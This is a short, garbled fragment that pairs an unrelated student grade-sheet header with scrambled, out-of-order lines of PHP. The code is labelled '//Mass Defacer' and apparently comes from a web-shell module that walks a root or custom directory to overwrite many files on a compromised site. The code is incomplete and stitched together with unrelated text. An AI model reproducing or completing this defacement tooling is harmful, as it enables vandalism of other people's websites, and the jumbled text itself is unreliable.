Student Name Roll No. Reg. No Course Name Gread Point
$file2 = trim($file
foreach (files($mddir) as $key => $file) {
}
$mddir = $custom_dir;
if ($def_dir == "custom") {
}
$mddir = $rootdir;
if ($def_dir == "root") {
} else {
error("You must enter a custom directory when using the Custom option!");
} elseif (empty($custom_dir) && $def_dir == "custom") {
error("You must enter a source!");
if (empty($mass_source)) {
$success = 0;
$failed = 0;
$custom_dir = rtrim($custom_dir
}
} else {
if (get_magic_quotes_gpc()) {
//Mass Defacer